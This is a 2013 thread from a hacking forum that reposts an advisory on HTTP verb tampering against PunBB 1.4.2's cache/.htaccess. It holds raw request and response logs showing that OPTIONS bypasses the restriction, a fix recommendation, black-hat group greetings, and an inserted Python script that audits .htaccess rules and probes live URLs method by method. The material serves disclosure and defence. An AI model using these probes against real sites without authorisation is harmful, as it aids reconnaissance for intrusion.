Anti-armenia.ORG - Forums - PunBB 1.4.2 HTTP VERB Tampering



2013-04-02 21:56 GMT

BlackMinD
Pr0grammer


One of the interesting and neat vulns)

http://cxsecurity.com/issue/WLB-2013040005

Code:
===============================================================
Vulnerable software: PunBB 1.4.2
Official site: http://punbb.informer.com/
Vuln: HTTP Verb Tampering.
Checked version: PunBB 1.4.2
===============================================================

About software:
===============================================================

PunBB is a fast and lightweight PHP-powered discussion board. It is released under the GNU General Public License.
Its primary goals are to be faster, smaller and less graphically intensive as compared to other discussion boards.
PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller,
semantically correct XHTML-compliant pages.

*Copy/paste from official wiki.*
===============================================================
About vuln:

punbb-1.4.2 is vulnerable to HTTP VERB Tampering because it tries to restrict HTTP access to its own cache/ directory
in an insecure manner.
I'm pretty sure we can call the following approach "black listing".
But as we all know, the black listing approach sucks, as always.
Take a look:

==========/punbb-1.4.2/cache/.htaccess=====

<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>
=====================================
Note: THIS file is shipped by default with the latest 1.4.2 version.
Other versions may also be affected but I didn't check.

Using the following .htaccess file in its cache/ directory, punbb denies HTTP GET, POST and PUT request(s) to the files
in the cache directory.
But what about other HTTP methods?
Here are a few "fingerprinting" methods against real sites: (Notice the status codes)

===============================================================
TEST 1: GET method

REQUEST METHOD: GET
URL: http://examplesite/punbb/cache/index.html
Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive


Server Returns:

HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:26:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html
on this server.</p>
</body></html>
===============================================================

TEST 2
REQUEST METHOD: POST
URL: http://examplesite/punbb/cache/index.html

Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 42


$_POST data to send:

&id=this is a test for HTTP VERB tampering



Server Returns:

HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:28:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html
on this server.</p>
</body></html>



===============================================================

TEST 3: Fun begins.
Request method: OPTIONS
URL: http://examplesite/punbb/cache/index.html

Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0


Server returns:
HTTP/1.1 200 OK <===========Notice
Date: Tue, 02 Apr 2013 00:32:09 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html



======================================

TEST 4: Notice again the status code: 404
Method: OPTIONS
URL: http://examplesite/punbb/cache/not_existense_filename_checking_notice_status_code.php


Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0



Server returns:

HTTP/1.1 404 Not Found
Date: Tue, 02 Apr 2013 00:36:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 264
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /punbb/cache/not_existense_filename_checking_notice_status_code.php was not found on this
server.</p>
</body></html>


======================================


Using the following way(s) an attacker may, for example:
Access cache files. In itself this issue may open new attacks or give more chances to an attacker.

Do not use the black listing approach; use white listing instead.
So don't use the Limit directive in your .htaccess file.
In this case a simple *deny from all* instead will do its own job. (If I'm wrong please correct me)



=========================================
KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
http://exploit-db.com/

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE

*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
===========================================

/AkaStep

Motherland!
Anti-armenia.ORG
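The checks the advisory walks through (TEST 1-4) and the .htaccess comparison in its closing advice, as an added Python example that is not part of the advisory, of PunBB, or of this thread. It assumes Apache's documented behaviour that a restriction on GET inside <Limit> also covers HEAD, that an access rule placed outside any <Limit> applies to every method, and that TRACE is governed by TraceEnable rather than <Limit>; the method list, the "verb-probe" User-Agent, the FIXED snippet and the function names are the example's own.

```python
#!/usr/bin/env python3
"""Verb-tampering check for an Apache <Limit>-guarded directory.

Added example, not code from the advisory or from PunBB.  Two tools in one file:
  limit_gap()  - reads an .htaccess snippet and lists the HTTP methods its
                 Deny rules do NOT cover (Apache scores HEAD as GET, so a
                 <Limit GET> also blocks HEAD; TRACE is outside <Limit> and is
                 switched off with TraceEnable instead).
  probe()      - repeats the advisory's TEST 1-4 against a live URL, one
                 request per method, and returns {method: status}.
"""
import http.client
import re
import sys
from urllib.parse import urlsplit

# Methods Apache's <Limit>/<LimitExcept> accept (TRACE deliberately absent).
APACHE_METHODS = ["GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS",
                  "PATCH", "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK"]

LIMIT_RE = re.compile(r"<Limit\s+([^>]+)>(.*?)</Limit>", re.I | re.S)
LIMIT_EXCEPT_RE = re.compile(r"<LimitExcept\s+([^>]+)>(.*?)</LimitExcept>", re.I | re.S)
# Apache 2.2 "Deny from all" or the 2.4 equivalent "Require all denied".
DENY_RE = re.compile(r"^[ \t]*(Deny[ \t]+from[ \t]+all|Require[ \t]+all[ \t]+denied)[ \t]*$",
                     re.I | re.M)

# The cache/.htaccess that PunBB 1.4.2 ships, as quoted in the advisory.
SHIPPED = """<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>
"""

# The unconditional form the advisory recommends (2.2 syntax; on Apache 2.4
# "Require all denied" on its own does the same job).  Example's own snippet.
FIXED = """Order Allow,Deny
Deny from All
"""


def _methods(spec):
    """Normalise a <Limit>/<LimitExcept> method list; HEAD rides along with GET."""
    names = {m.upper() for m in spec.split()}
    if "GET" in names:
        names.add("HEAD")
    return names


def limit_gap(htaccess):
    """Return the methods the snippet leaves unrestricted, in APACHE_METHODS order.

    [] means every method is denied, which is what you want for cache/.
    """
    outside = LIMIT_EXCEPT_RE.sub("", LIMIT_RE.sub("", htaccess))
    if DENY_RE.search(outside):
        return []                      # Deny outside any <Limit> covers all verbs
    denied = set()
    for spec, body in LIMIT_RE.findall(htaccess):
        if DENY_RE.search(body):
            denied |= _methods(spec)   # blacklist: only the listed verbs
    for spec, body in LIMIT_EXCEPT_RE.findall(htaccess):
        if DENY_RE.search(body):
            denied |= set(APACHE_METHODS) - _methods(spec)  # whitelist form
    return [m for m in APACHE_METHODS if m not in denied]


def probe(url, methods=("GET", "HEAD", "POST", "PUT", "OPTIONS", "TRACE"), timeout=10):
    """Send each method to url and map it to the status code received.

    Does real network I/O: only point it at hosts you are authorised to test.
    A method that fails at the socket level is recorded as -1.
    """
    parts = urlsplit(url)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    results = {}
    for method in methods:
        conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
        try:
            conn.request(method, path, headers={"User-Agent": "verb-probe/0.1"})
            results[method] = conn.getresponse().status
        except OSError:
            results[method] = -1
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    print("shipped .htaccess leaves open:", ", ".join(limit_gap(SHIPPED)))
    print("fixed .htaccess leaves open:  ", limit_gap(FIXED) or "nothing")
    if len(sys.argv) > 1:               # e.g. http://examplesite/punbb/cache/index.html
        for method, status in probe(sys.argv[1]).items():
            print(f"{method:8s} {status}")
```

Run with no arguments to compare the two snippets statically; pass a URL such as the advisory's /punbb/cache/index.html to repeat its tests against a host you are authorised to test. The 403 for GET and POST next to the 200 for OPTIONS in the advisory is exactly the gap that limit_gap() reports for the shipped file: OPTIONS, DELETE and every WebDAV verb fall outside <Limit GET POST PUT>, while the unconditional Deny leaves nothing open.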
    

2013-04-03 06:34 GMT

Ferid23
Admin


Congratulations

AZ Domain Report Line (report the vulnerabilities found on Azerbaijani sites to us): http://anti-armenia.org/forums.php?m=posts&q=572
Rules (read and follow the site's rules)
    

2013-04-03 15:49 GMT

M4NY3T!K
Gold


Congratulations Bro

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png